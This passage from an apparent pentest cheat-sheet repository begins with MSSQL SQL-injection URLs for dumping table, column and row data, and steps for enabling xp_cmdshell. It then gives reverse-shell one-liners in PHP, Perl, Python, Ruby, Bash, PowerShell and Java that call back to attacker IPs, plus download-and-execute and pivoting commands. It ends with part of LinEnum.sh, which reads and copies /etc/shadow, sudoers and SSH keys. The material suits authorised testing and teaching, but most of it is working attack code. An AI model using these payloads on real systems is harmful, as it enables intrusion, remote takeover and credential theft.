varchar(4096)) FROM dbname..sysobjects where xtype='U' AND name NOT IN ('previouslyFoundTable',...))--` 937 | 938 | 939 | #### Columns within a table 940 | 941 | 942 | `http://192.168.1.104/Less-1/?id=-1 or 1 in (SELECT TOP 1 CAST(dbname..syscolumns.name as varchar(4096)) FROM dbname..syscolumns, dbname..sysobjects WHERE dbname..syscolumns.id=dbname..sysobjects.id AND dbname..sysobjects.name = 'tablename')--` 943 | 944 | > remember to change **dbname** and **tablename** accordingly with the given situation 945 | > after each iteration a new column name will be found, make sure add it to ** previously found column name ** separated by comma as on the next sample 946 | 947 | `http://192.168.1.104/Less-1/?id=-1 or 1 in (SELECT TOP 1 CAST(dbname..syscolumns.name as varchar(4096)) FROM dbname..syscolumns, dbname..sysobjects WHERE dbname..syscolumns.id=dbname..sysobjects.id AND dbname..sysobjects.name = 'tablename' AND dbname..syscolumns.name NOT IN('previously found column name', ...))--` 948 | 949 | 950 | #### Actual data 951 | 952 | 953 | `http://192.168.1.104/Less-1/?id=-1 or 1 in (SELECT TOP 1 CAST(columnName as varchar(4096)) FROM tablename)--` 954 | 955 | > after each iteration a new column name will be found, make sure add it to ** previously found column name ** separated by comma as on the next sample 956 | 957 | `http://192.168.1.104/Less-1/?id=-1 or 1 in (SELECT TOP 1 CAST(columnName as varchar(4096)) FROM tablename AND name NOT IN('previously found row data'))--` 958 | 959 | 960 | #### Shell commands 961 | 962 | `EXEC master..xp_cmdshell <command>` 963 | 964 | > you need yo be 'sa' user 965 | 966 | #### Enabling shell commands 967 | 968 | `EXEC sp_configure 'show advanced options', 1; RECONFIGURE; EXEC sp_congigure 'xp_shell', 1; RECONFIGURE;` 969 | 970 | 971 | ### Jenkins 972 | 973 | ## 974 | 975 | # Post Exploitation 976 | 977 | ## Reverse Shell 978 | 979 | 980 | ### PHP Reverse Shell 981 | 982 | ```php 983 | php -r '$sock=fsockopen("10.0.0.1",1234);exec("/bin/sh -i <&3 >&3 2>&3");' 984 | ``` 985 | 986 | Tiny Reverse Shell 987 | 988 | ```php 989 | <?php 990 | exec("/bin/bash -c 'bash -i >& /dev/tcp/10.9.36.167/1337 0>&1'"); 991 | ``` 992 | 993 | ### Perl Reverse Shell 994 | 995 | ```perl 996 | perl -e 'use Socket;$i="10.0.0.1";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};' 997 | 998 | ``` 999 | 1000 | ### Python Reverse Shell 1001 | 1002 | ```python 1003 | python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);' 1004 | ``` 1005 | 1006 | ### Ruby Reverse Shell 1007 | 1008 | ```ruby 1009 | ruby -rsocket -e'f=TCPSocket.open("10.0.0.1",1234).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)' 1010 | ``` 1011 | 1012 | ### Bash Reverse Shell 1013 | 1014 | ```bash 1015 | bash -i >& /dev/tcp/10.0.0.1/8080 0>&1 1016 | ``` 1017 | ### Powershell Reverse Shell 1018 | 1019 | Create a simple powershell script called reverse.ps1: 1020 | 1021 | ```powershell 1022 | function reverse_powershell { 1023 | $client = New-Object System.Net.Sockets.TCPClient("10.10.10.10",80);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close() 1024 | } 1025 | ``` 1026 | 1027 | ```powershell 1028 | powershell -ExecutionPolicy bypass -command "Import-Module reverse.ps1; reverse_powershell" 1029 | ``` 1030 | 1031 | ### Java Reverse Shell 1032 | 1033 | ```java 1034 | r = Runtime.getRuntime() 1035 | p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/10.0.0.1/2002;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[]) 1036 | p.waitFor() 1037 | ``` 1038 | 1039 | ### Xterm Reverse Shell 1040 | 1041 | One of the simplest forms of reverse shell is an xterm session. The following command should be run on the server. It will try to connect back to you (10.0.0.1) on TCP port 6001. 1042 | 1043 | ```bash 1044 | xterm -display 10.0.0.1:1 1045 | ``` 1046 | 1047 | To catch the incoming xterm, start an X-Server (:1 – which listens on TCP port 6001). One way to do this is with Xnest (to be run on your system): 1048 | 1049 | ```bash 1050 | Xnest :1 1051 | 1052 | ``` 1053 | 1054 | You’ll need to authorise the target to connect to you (command also run on your host): 1055 | 1056 | ```bash 1057 | xhost +targetip 1058 | ``` 1059 | 1060 | ## 1061 | 1062 | ## Linux 1063 | 1064 | ## Windows 1065 | 1066 | ### Transferring Files Without Metasploit 1067 | 1068 | #### Powershell 1069 | 1070 | Download files with powershell 1071 | 1072 | ```powershell 1073 | powershell -c "Invoke-WebRequest -uri 'http://Your-IP:Your-Port/winPEAS.bat' -OutFile 'C:\Windows\Temp\winPEAS.bat'" 1074 | ``` 1075 | 1076 | ```powershell 1077 | powershell iex (New-Object Net.WebClient).DownloadString('http://your-ip:your-port/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress your-ip -Port your-port 1078 | ``` 1079 | 1080 | ```powershell 1081 | powershell "(New-Object System.Net.WebClient).Downloadfile('http://<ip>:8000/shell-name.exe','shell-name.exe')" 1082 | ``` 1083 | 1084 | Creating a server with python3 1085 | 1086 | ```shell 1087 | python -m http.server 1088 | ``` 1089 | 1090 | Creating a server with python2 1091 | 1092 | ```shell 1093 | python -m SimpleHTTPServer 80 1094 | ``` 1095 | 1096 | #### FTP 1097 | 1098 | You need to create a FTP server 1099 | 1100 | * Server Linux 1101 | Allow anonymous 1102 | 1103 | ```shell 1104 | python -m pyftpdlib -p 21 -u anonymous -P anonymous 1105 | ``` 1106 | 1107 | * Windows Client 1108 | 1109 | ```shell 1110 | ftp 1111 | open target_ip port 1112 | open 192.168.1.22 21 1113 | ``` 1114 | 1115 | we can simply run ftp -s:ftp_commands.txt and we can download a file with no user interaction. 1116 | 1117 | like this: 1118 | 1119 | ```shell 1120 | C:\Users\kitsunesec\Desktop>echo open 10.9.122.8>ftp_commands.txt 1121 | C:\Users\kitsunesec\Desktop>echo anonymous>>ftp_commands.txt 1122 | C:\Users\kitsunesec\Desktop>echo whatever>>ftp_commands.txt 1123 | C:\Users\kitsunesec\Desktop>ftp -s:ftp_commands.txt 1124 | ``` 1125 | 1126 | #### Apache Server 1127 | 1128 | * server 1129 | Put your files into /var/www/html 1130 | 1131 | ```shell 1132 | cp nc.exe /var/www/html 1133 | systemctl start apache2 1134 | ``` 1135 | 1136 | * client 1137 | 1138 | Get via web browser, wget or powershell... 1139 | 1140 | ### Windows Pivoting 1141 | 1142 | #### Openssh for Tunneling 1143 | 1144 | Once you got SYSTEM on the target machine. download: [openssh_for_windows](https://github.com/PowerShell/Win32-OpenSSH/releases) 1145 | 1146 | ```powershell 1147 | powershell -command "Expand-Archive 'C:\<path-to-zipped-openssh>\openssh.zip' c:\<path-to-where-you-whereever-you-want\" 1148 | ``` 1149 | 1150 | Then install it: 1151 | 1152 | ```powershell 1153 | powershell -ExecutionPolicy Bypass -File c:\<path-to-unzipped-openssh-folder>\install-sshd.ps1 1154 | ``` 1155 | 1156 | Now if you need, just adjust the firewall rules to your needs: 1157 | 1158 | ```powershell 1159 | powershell -Command "New-NetFirewallRule -Name sshd -DisplayName 'OpenSSH Server (sshd)' -Enabled True -Direction Inbound -Protocol TCP -Action Allow -LocalPort 22" 1160 | ``` 1161 | 1162 | Start the sshd service: 1163 | 1164 | ```powershell 1165 | net start sshd 1166 | ``` 1167 | 1168 | After these steps a regular ssh tunnel would sufice: 1169 | 1170 | From your linux machine: 1171 | 1172 | ```bash 1173 | $ ssh -ACv -D <tunnel_port> <windows-user>@<windows-ip> 1174 | ``` 1175 | 1176 | done you have now a socks to tunnel through!! 1177 | 1178 | 1179 | ## 1180 | 1181 | # Resources 1182 | 1183 | ## 1184 | 1185 | #### HTTP/HTTPS Servers 1186 | 1187 | 1188 | HTTPS using Python 1189 | 1190 | Create the Certificate: 1191 | 1192 | ``` 1193 | openssl req -new -x509 -keyout server.pem -out server.pem -days 365 -nodes 1194 | ``` 1195 | 1196 | Start the HTTPS Server 1197 | 1198 | ``` 1199 | import BaseHTTPServer, SimpleHTTPServer 1200 | import ssl 1201 | 1202 | httpd = BaseHTTPServer.HTTPServer(('0.0.0.0', 443), SimpleHTTPServer.SimpleHTTPRequestHandler) 1203 | httpd.socket = ssl.wrap_socket (httpd.socket, certfile='./server.pem', server_side=True) 1204 | httpd.serve_forever() 1205 | ``` 1206 | ## Wordlists 1207 | 1208 | * Wordlists 1209 | * [PacketStorm](https://packetstormsecurity.com/Crackers/wordlists/dictionaries/) 1210 | * [SecList](https://github.com/danielmiessler/SecLists) 1211 | * [cotse](http://www.cotse.com/tools/wordlists1.htm) 1212 | * Default Password 1213 | * [DefaultPassword](http://www.defaultpassword.com/) 1214 | * [RouterPassword](http://www.routerpasswords.com/) 1215 | * Leak 1216 | * [Pastebin](https://pastebin.com) 1217 | * Tables 1218 | * [RainbowCrack](https://project-rainbowcrack.com/table.htm) 1219 | 1220 | ## 1221 | 1222 | ## Contribution 1223 | 1224 | [HOW TO](https://github.com/Kitsun3Sec/Pentest-Cheat-Sheets/tree/master/contribution.md) 1225 | -------------------------------------------------------------------------------- /CheatSheets/linux/pos_xpl/LinEnum.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | #A script to enumerate local information from a Linux host 3 | v="version 0.6" 4 | #@rebootuser 5 | 6 | #help function 7 | usage () 8 | { 9 | echo -e "\n\e[00;31m#########################################################\e[00m" 10 | echo -e "\e[00;31m#\e[00m" "\e[00;33mLocal Linux Enumeration & Privilege Escalation Script\e[00m" "\e[00;31m#\e[00m" 11 | echo -e "\e[00;31m#########################################################\e[00m" 12 | echo -e "\e[00;33m# www.rebootuser.com | @rebootuser \e[00m" 13 | echo -e "\e[00;33m# $v\e[00m\n" 14 | echo -e "\e[00;33m# Example: ./LinEnum.sh -k keyword -r report -e /tmp/ -t \e[00m\n" 15 | 16 | echo "OPTIONS:" 17 | echo "-k Enter keyword" 18 | echo "-e Enter export location" 19 | echo "-t Include thorough (lengthy) tests" 20 | echo "-r Enter report name" 21 | echo "-h Displays this help text" 22 | echo -e "\n" 23 | echo "Running with no options = limited scans/no output file" 24 | 25 | echo -e "\e[00;31m#########################################################\e[00m" 26 | } 27 | while getopts "h:k:r:e:t" option; do 28 | case "${option}" in 29 | k) keyword=${OPTARG};; 30 | r) report=${OPTARG}"-"`date +"%d-%m-%y"`;; 31 | e) export=${OPTARG};; 32 | t) thorough=1;; 33 | h) usage; exit;; 34 | *) usage; exit;; 35 | esac 36 | done 37 | 38 | echo -e "\n\e[00;31m#########################################################\e[00m" |tee -a $report 2>/dev/null 39 | echo -e "\e[00;31m#\e[00m" "\e[00;33mLocal Linux Enumeration & Privilege Escalation Script\e[00m" "\e[00;31m#\e[00m" |tee -a $report 2>/dev/null 40 | echo -e "\e[00;31m#########################################################\e[00m" |tee -a $report 2>/dev/null 41 | echo -e "\e[00;33m# www.rebootuser.com\e[00m" |tee -a $report 2>/dev/null 42 | echo -e "\e[00;33m# $version\e[00m\n" |tee -a $report 2>/dev/null 43 | 44 | echo "Debug Info" |tee -a $report 2>/dev/null 45 | 46 | if [ "$keyword" ]; then 47 | echo "keyword = $keyword" |tee -a $report 2>/dev/null 48 | else 49 | : 50 | fi 51 | 52 | if [ "$report" ]; then 53 | echo "report name = $report" |tee -a $report 2>/dev/null 54 | else 55 | : 56 | fi 57 | 58 | if [ "$export" ]; then 59 | echo "export location = $export" |tee -a $report 2>/dev/null 60 | else 61 | : 62 | fi 63 | 64 | if [ "$thorough" ]; then 65 | echo "thorough tests = enabled" |tee -a $report 2>/dev/null 66 | else 67 | echo "thorough tests = disabled" |tee -a $report 2>/dev/null 68 | fi 69 | 70 | sleep 2 71 | 72 | if [ "$export" ]; then 73 | mkdir $export 2>/dev/null 74 | format=$export/LinEnum-export-`date +"%d-%m-%y"` 75 | mkdir $format 2>/dev/null 76 | else 77 | : 78 | fi 79 | 80 | who=`whoami` 2>/dev/null |tee -a $report 2>/dev/null 81 | echo -e "\n" |tee -a $report 2>/dev/null 82 | 83 | echo -e "\e[00;33mScan started at:"; date |tee -a $report 2>/dev/null 84 | echo -e "\e[00m\n" |tee -a $report 2>/dev/null 85 | 86 | echo -e "\e[00;33m### SYSTEM ##############################################\e[00m" |tee -a $report 2>/dev/null 87 | 88 | #basic kernel info 89 | unameinfo=`uname -a 2>/dev/null` 90 | if [ "$unameinfo" ]; then 91 | echo -e "\e[00;31mKernel information:\e[00m\n$unameinfo" |tee -a $report 2>/dev/null 92 | echo -e "\n" |tee -a $report 2>/dev/null 93 | else 94 | : 95 | fi 96 | 97 | procver=`cat /proc/version 2>/dev/null` 98 | if [ "$procver" ]; then 99 | echo -e "\e[00;31mKernel information (continued):\e[00m\n$procver" |tee -a $report 2>/dev/null 100 | echo -e "\n" |tee -a $report 2>/dev/null 101 | else 102 | : 103 | fi 104 | 105 | #search all *-release files for version info 106 | release=`cat /etc/*-release 2>/dev/null` 107 | if [ "$release" ]; then 108 | echo -e "\e[00;31mSpecific release information:\e[00m\n$release" |tee -a $report 2>/dev/null 109 | echo -e "\n" |tee -a $report 2>/dev/null 110 | else 111 | : 112 | fi 113 | 114 | #target hostname info 115 | hostnamed=`hostname 2>/dev/null` 116 | if [ "$hostnamed" ]; then 117 | echo -e "\e[00;31mHostname:\e[00m\n$hostnamed" |tee -a $report 2>/dev/null 118 | echo -e "\n" |tee -a $report 2>/dev/null 119 | else 120 | : 121 | fi 122 | 123 | echo -e "\e[00;33m### USER/GROUP ##########################################\e[00m" |tee -a $report 2>/dev/null 124 | 125 | #current user details 126 | currusr=`id 2>/dev/null` 127 | if [ "$currusr" ]; then 128 | echo -e "\e[00;31mCurrent user/group info:\e[00m\n$currusr" |tee -a $report 2>/dev/null 129 | echo -e "\n" |tee -a $report 2>/dev/null 130 | else 131 | : 132 | fi 133 | 134 | #last logged on user information 135 | lastlogedonusrs=`lastlog 2>/dev/null |grep -v "Never" 2>/dev/null` 136 | if [ "$lastlogedonusrs" ]; then 137 | echo -e "\e[00;31mUsers that have previously logged onto the system:\e[00m\n$lastlogedonusrs" |tee -a $report 2>/dev/null 138 | echo -e "\n" |tee -a $report 2>/dev/null 139 | else 140 | : 141 | fi 142 | 143 | 144 | #who else is logged on 145 | loggedonusrs=`w 2>/dev/null` 146 | if [ "$loggedonusrs" ]; then 147 | echo -e "\e[00;31mWho else is logged on:\e[00m\n$loggedonusrs" |tee -a $report 2>/dev/null 148 | echo -e "\n" |tee -a $report 2>/dev/null 149 | else 150 | : 151 | fi 152 | 153 | #lists all id's and respective group(s) 154 | grpinfo=`for i in $(cat /etc/passwd 2>/dev/null| cut -d":" -f1 2>/dev/null);do id $i;done 2>/dev/null` 155 | if [ "$grpinfo" ]; then 156 | echo -e "\e[00;31mGroup memberships:\e[00m\n$grpinfo" |tee -a $report 2>/dev/null 157 | echo -e "\n" |tee -a $report 2>/dev/null 158 | else 159 | : 160 | fi 161 | 162 | #checks to see if any hashes are stored in /etc/passwd (depreciated *nix storage method) 163 | hashesinpasswd=`grep -v '^[^:]*:[x]' /etc/passwd 2>/dev/null` 164 | if [ "$hashesinpasswd" ]; then 165 | echo -e "\e[00;33mIt looks like we have password hashes in /etc/passwd!\e[00m\n$hashesinpasswd" |tee -a $report 2>/dev/null 166 | echo -e "\n" |tee -a $report 2>/dev/null 167 | else 168 | : 169 | fi 170 | 171 | #locate custom user accounts with some 'known default' uids 172 | readpasswd=`grep -v "^#" /etc/passwd | awk -F: '$3 == 0 || $3 == 500 || $3 == 501 || $3 == 502 || $3 == 1000 || $3 == 1001 || $3 == 1002 || $3 == 2000 || $3 == 2001 || $3 == 2002 { print }'` 173 | if [ "$readpasswd" ]; then 174 | echo -e "\e[00;31mSample entires from /etc/passwd (searching for uid values 0, 500, 501, 502, 1000, 1001, 1002, 2000, 2001, 2002):\e[00m\n$readpasswd" |tee -a $report 2>/dev/null 175 | echo -e "\n" |tee -a $report 2>/dev/null 176 | else 177 | : 178 | fi 179 | 180 | if [ "$export" ] && [ "$readpasswd" ]; then 181 | mkdir $format/etc-export/ 2>/dev/null 182 | cp /etc/passwd $format/etc-export/passwd 2>/dev/null 183 | else 184 | : 185 | fi 186 | 187 | #checks to see if the shadow file can be read 188 | readshadow=`cat /etc/shadow 2>/dev/null` 189 | if [ "$readshadow" ]; then 190 | echo -e "\e[00;33m***We can read the shadow file!\e[00m\n$readshadow" |tee -a $report 2>/dev/null 191 | echo -e "\n" |tee -a $report 2>/dev/null 192 | else 193 | : 194 | fi 195 | 196 | if [ "$export" ] && [ "$readshadow" ]; then 197 | mkdir $format/etc-export/ 2>/dev/null 198 | cp /etc/shadow $format/etc-export/shadow 2>/dev/null 199 | else 200 | : 201 | fi 202 | 203 | #checks to see if /etc/master.passwd can be read - BSD 'shadow' variant 204 | readmasterpasswd=`cat /etc/master.passwd 2>/dev/null` 205 | if [ "$readmasterpasswd" ]; then 206 | echo -e "\e[00;33m***We can read the master.passwd file!\e[00m\n$readmasterpasswd" |tee -a $report 2>/dev/null 207 | echo -e "\n" |tee -a $report 2>/dev/null 208 | else 209 | : 210 | fi 211 | 212 | if [ "$export" ] && [ "$readmasterpasswd" ]; then 213 | mkdir $format/etc-export/ 2>/dev/null 214 | cp /etc/master.passwd $format/etc-export/master.passwd 2>/dev/null 215 | else 216 | : 217 | fi 218 | 219 | #all root accounts (uid 0) 220 | echo -e "\e[00;31mSuper user account(s):\e[00m" | tee -a $report 2>/dev/null; grep -v -E "^#" /etc/passwd 2>/dev/null| awk -F: '$3 == 0 { print $1}' 2>/dev/null |tee -a $report 2>/dev/null 221 | echo -e "\n" |tee -a $report 2>/dev/null 222 | 223 | #pull out vital sudoers info 224 | sudoers=`cat /etc/sudoers 2>/dev/null | grep -v -e '^$' 2>/dev/null |grep -v "#" 2>/dev/null` 225 | if [ "$sudoers" ]; then 226 | echo -e "\e[00;31mSudoers configuration (condensed):\e[00m$sudoers" | tee -a $report 2>/dev/null 227 | echo -e "\n" |tee -a $report 2>/dev/null 228 | else 229 | : 230 | fi 231 | 232 | if [ "$export" ] && [ "$sudoers" ]; then 233 | mkdir $format/etc-export/ 2>/dev/null 234 | cp /etc/sudoers $format/etc-export/sudoers 2>/dev/null 235 | else 236 | : 237 | fi 238 | 239 | #can we sudo without supplying a password 240 | sudoperms=`echo '' | sudo -S -l 2>/dev/null` 241 | if [ "$sudoperms" ]; then 242 | echo -e "\e[00;33mWe can sudo without supplying a password!\e[00m\n$sudoperms" |tee -a $report 2>/dev/null 243 | echo -e "\n" |tee -a $report 2>/dev/null 244 | else 245 | : 246 | fi 247 | 248 | #known 'good' breakout binaries 249 | sudopwnage=`echo '' | sudo -S -l 2>/dev/null | grep -w 'nmap\|perl\|'awk'\|'find'\|'bash'\|'sh'\|'man'\|'more'\|'less'\|'vi'\|'emacs'\|'vim'\|'nc'\|'netcat'\|python\|ruby\|lua\|irb' | xargs -r ls -la 2>/dev/null` 250 | if [ "$sudopwnage" ]; then 251 | echo -e "\e[00;33m***Possible Sudo PWNAGE!\e[00m\n$sudopwnage" |tee -a $report 2>/dev/null 252 | echo -e "\n" |tee -a $report 2>/dev/null 253 | else 254 | : 255 | fi 256 | 257 | #checks to see if roots home directory is accessible 258 | rthmdir=`ls -ahl /root/ 2>/dev/null` 259 | if [ "$rthmdir" ]; then 260 | echo -e "\e[00;33m***We can read root's home directory!\e[00m\n$rthmdir" |tee -a $report 2>/dev/null 261 | echo -e "\n" |tee -a $report 2>/dev/null 262 | else 263 | : 264 | fi 265 | 266 | #displays /home directory permissions - check if any are lax 267 | homedirperms=`ls -ahl /home/ 2>/dev/null` 268 | if [ "$homedirperms" ]; then 269 | echo -e "\e[00;31mAre permissions on /home directories lax:\e[00m\n$homedirperms" |tee -a $report 2>/dev/null 270 | echo -e "\n" |tee -a $report 2>/dev/null 271 | else 272 | : 273 | fi 274 | 275 | #looks for files we can write to that don't belong to us 276 | if [ "$thorough" = "1" ]; then 277 | grfilesall=`find / -writable -not -user \`whoami\` -type f -not -path "/proc/*" -exec ls -al {} \; 2>/dev/null` 278 | if [ "$grfilesall" ]; then 279 | echo -e "\e[00;31mFiles not owned by user but writable by group:\e[00m\n$grfilesall" |tee -a $report 2>/dev/null 280 | echo -e "\n" |tee -a $report 2>/dev/null 281 | else 282 | : 283 | fi 284 | fi 285 | 286 | #looks for world-reabable files within /home - depending on number of /home dirs & files, this can take some time so is only 'activated' with thorough scanning switch 287 | if [ "$thorough" = "1" ]; then 288 | wrfileshm=`find /home/ -perm -4 -type f -exec ls -al {} \; 2>/dev/null` 289 | if [ "$wrfileshm" ]; then 290 | echo -e "\e[00;31mWorld-readable files within /home:\e[00m\n$wrfileshm" |tee -a $report 2>/dev/null 291 | echo -e "\n" |tee -a $report 2>/dev/null 292 | else 293 | : 294 | fi 295 | else 296 | : 297 | fi 298 | 299 | if [ "$thorough" = "1" ]; then 300 | if [ "$export" ] && [ "$wrfileshm" ]; then 301 | mkdir $format/wr-files/ 2>/dev/null 302 | for i in $wrfileshm; do cp --parents $i $format/wr-files/ ; done 2>/dev/null 303 | else 304 | : 305 | fi 306 | else 307 | : 308 | fi 309 | 310 | #lists current user's home directory contents 311 | if [ "$thorough" = "1" ]; then 312 | homedircontents=`ls -ahl ~ 2>/dev/null` 313 | if [ "$homedircontents" ] ; then 314 | echo -e "\e[00;31mHome directory contents:\e[00m\n$homedircontents" |tee -a $report 2>/dev/null 315 | echo -e "\n" |tee -a $report 2>/dev/null 316 | else 317 | : 318 | fi 319 | else 320 | : 321 | fi 322 | 323 | #checks for if various ssh files are accessible - this can take some time so is only 'activated' with thorough scanning switch 324 | if [ "$thorough" = "1" ]; then 325 | sshfiles=`find / \( -name "id_dsa*" -o -name "id_rsa*" -o -name "known_hosts" -o -name "authorized_hosts" -o -name "authorized_keys" \) -exec ls -la {} 2>/dev/null \;` 326 | if [ "$sshfiles" ]; then 327 | echo -e "\e[00;31mSSH keys/host information found in the following locations:\e[00m\n$sshfiles" |tee -a $report 2>/dev/null 328 | echo -e "\n" |tee -a $report 2>/dev/null 329 | else 330 | : 331 | fi 332 | else 333 | : 334 | fi 335 | 336 | if [ "$thorough" = "1" ]; then 337 | if [ "$export" ] && [ "$sshfiles" ]; then 338 | mkdir $format/ssh-files/ 2>/dev/null 339 | for i in $sshfiles; do cp --parents $i $format/ssh-files/; done 2>/dev/null 340 | else 341 | : 342 | fi 343 | else 344 | : 345 | fi 346 | 347 | #is root permitted to login via ssh 348 | sshrootlogin=`grep "PermitRootLogin " /etc/ssh/sshd_config 2>/dev/null | grep -v "#" | awk '{print $2}'` 349 | if [ "$sshrootlogin" = "yes" ]; then 350 | echo -e "\e[00;31mRoot is allowed to login via SSH:\e[00m" |tee -a $report 2>/dev/null; grep "PermitRootLogin " /etc/ssh/sshd_config 2>/dev/null | grep -v "#" |tee -a $report 2>/dev/null 351 | echo -e "\n" |tee -a $report 2>/dev/null 352 | else 353 | : 354 | fi 355 | 356 | echo -e "\e[00;33m### ENVIRONMENTAL #######################################\e[00m" |tee -a $report 2>/dev/null 357 | 358 | #env information 359 | envinfo=`env 2>/dev/null | grep -v 'LS_COLORS' 2>/dev/null` 360 | if [ "$envinfo" ]; then 361 | echo -e "\e[00;31m Environment information:\e[00m\n$envinfo" |tee -a $report 2>/dev/null 362 | echo -e "\n" |tee -a $report 2>/dev/null 363 | else 364 | : 365 | fi 366 | 367 | #current path configuration 368 | pathinfo=`echo $PATH 2>/dev/null` 369 | if [ "$pathinfo" ]; then 370 | echo -e "\e[00;31mPath information:\e[00m\n$pathinfo" |tee -a $report 2>/dev/null 371 | echo -e "\n" |tee -a $report 2>/dev/null 372 | else 373 | : 374 | fi 375 | 376 | #lists available shells 377 | shellinfo=`cat /etc/shells 2>/dev/null` 378 | if [ "$shellinfo" ]; then 379 | echo -e "\e[00;31mAvailable shells:\e[00m\n$shellinfo" |tee -a $report 2>/dev/null 380 | echo -e "\n" |tee -a $report 2>/dev/null 381 | else 382 | : 383 | fi 384 | 385 | #current umask value with both octal and symbolic output 386 | umask=`umask -S 2>/dev/null & umask 2>/dev/null` 387 | if [ "$umask" ]; then 388 | echo -e "\e[00;31mCurrent umask value:\e[00m\n$umask" |tee -a $report 2>/dev/null 389 | echo -e "\n" |tee -a $report 2>/dev/null 390 | else 391 | : 392 | fi 393 | 394 | #umask value as in /etc/login.defs 395 | umaskdef=`cat /etc/login.defs 2>/dev/null |grep -i UMASK 2>/dev/null |grep -v "#" 2>/dev/null` 396 | if [ "$umaskdef" ]; then 397 | echo -e "\e[00;31mumask value as specified in /etc/login.defs:\e[00m\n$umaskdef" |tee -a $report 2>/dev/null 398 | echo -e "\n" |tee -a $report 2>/dev/null 399 | else 400 | : 401 | fi 402 | 403 | #password policy information as stored in /etc/login.defs 404 | logindefs=`cat /etc/login.defs 2>/dev/null | grep "PASS_MAX_DAYS\|PASS_MIN_DAYS\|PASS_WARN_AGE\|ENCRYPT_METHOD" 2>/dev/null | grep -v "#" 2>/dev/null` 405 | if [ "$logindefs" ]; then 406 | echo -e "\e[00;31mPassword and storage information:\e[00m\n$logindefs" |tee -a $report 2>/dev/null 407 | echo -e "\n" |tee -a $report 2>/dev/null 408 | else 409 | : 410 | fi 411 | 412 | if [ "$export" ] && [ "$logindefs" ]; then 413 | mkdir $format/etc-export/ 2>/dev/null 414 | cp /etc/login.defs $format/etc-export/login.defs 2>/dev/null 415 | else 416 | : 417 | fi 418 | 419 | echo -e "\e[00;33m### JOBS/TASKS ##########################################\e[00m" |tee -a $report 2>/dev/null 420 | 421 | #are there any cron jobs configured 422 | cronjobs=`ls -la /etc/cron* 2>/dev/null` 423 | if [ "$cronjobs" ]; then 424 | echo -e "\e[00;31mCron jobs:\e[00m\n$cronjobs" |tee -a $report 2>/dev/null 425 | echo -e "\n" |tee -a $report 2>/dev/null 426 | else 427 | : 428 | fi 429 | 430 | #can we manipulate these jobs in any way 431 | cronjobwwperms=`find /etc/cron* -perm -0002 -type f -exec ls -la {} \; -exec cat {} 2>/dev/null \;` 432 | if [ "$cronjobwwperms" ]; then 433 | echo -e "\e[00;33m***World-writable cron jobs and file contents:\e[00m\n$cronjobwwperms" |tee -a $report 2>/dev/null 434 | echo -e "\n" |tee -a $report 2>/dev/null 435 | else 436 | : 437 | fi 438 | 439 | #contab contents 440 | crontab=`cat /etc/crontab 2>/dev/null` 441 | if [ "$crontab" ]; then 442 | echo -e "\e[00;31mCrontab contents:\e[00m\n$crontab" |tee -a $report 2>/dev/null 443 | echo -e "\n" |tee -a $report 2>/dev/null 444 | else 445 | : 446 | fi 447 | 448 | crontabvar=`ls -la /var/spool/cron/crontabs 2>/dev/null` 449 | if [ "$crontabvar" ]; then 450 | echo -e "\e[00;31mAnything interesting in /var/spool/cron/crontabs:\e[00m\n$crontabvar" |tee -a $report 2>/dev/null 451 | echo -e "\n" |tee -a $report 2>/dev/null 452 | else 453 | : 454 | fi 455 | 456 | anacronjobs=`ls -la /etc/anacrontab 2>/dev/null; cat /etc/anacrontab 2>/dev/null` 457 | if [ "$anacronjobs" ]; then 458 | echo -e "\e[00;31mAnacron jobs and associated file permissions:\e[00m\n$anacronjobs" |tee -a $report 2>/dev/null 459 | echo -e "\n" |tee -a $report 2>/dev/null 460 | else 461 | : 462 | fi 463 | 464 | anacrontab=`ls -la /var/spool/anacron 2>/dev/null` 465 | if [ "$anacrontab" ]; then 466 | echo -e "\e[00;31mWhen were jobs last executed (/var/spool/anacron contents):\e[00m\n$anacrontab" |tee -a $report 2>/dev/null 467 | echo -e "\n" |tee -a $report 2>/dev/null 468 | else 469 | : 470 | fi 471 | 472 | #pull out account names from /etc/passwd and see if any users have associated cronjobs (priv command) 473 | cronother=`cat /etc/passwd | cut -d ":" -f 1 | xargs -n1 crontab -l -u 2>/dev/null` 474 | if [ "$cronother" ]; then 475 | echo -e "\e[00;31mJobs held by all users:\e[00m\n$cronother" |tee -a $report 2>/dev/null 476 | echo -e "\n" |tee -a $report 2>/dev/null 477 | else 478 | : 479 | fi 480 | 481 | echo -e "\e[00;33m### NETWORKING ##########################################\e[00m" |tee -a $report 2>/dev/null 482 | 483 | #nic information 484 | nicinfo=`/sbin/ifconfig -a 2>/dev/null` 485 | if [ "$nicinfo" ]; then 486 | echo -e "\e[00;31mNetwork & IP info:\e[00m\n$nicinfo" |tee -a $report 2>/dev/null 487 | echo -e "\n" |tee -a $report 2>/dev/null 488 | else 489 | : 490 | fi 491 | 492 | arpinfo=`arp -a 2>/dev/null` 493 | if [ "$arpinfo" ]; then 494 | echo -e "\e[00;31mARP history:\e[00m\n$arpinfo" |tee -a $report 2>/dev/null 495 | echo -e "\n" |tee -a $report 2>/dev/null 496 | else 497 | : 498 | fi 499 | 500 | #dns settings 501 | nsinfo=`cat /etc/resolv.conf 2>/dev/null | grep "nameserver"` 502 | if [ "$nsinfo" ]; then 503 | echo -e "\e[00;31mNameserver(s):\e[00m\n$nsinfo" |tee -a $report 2>/dev/null 504 | echo -e 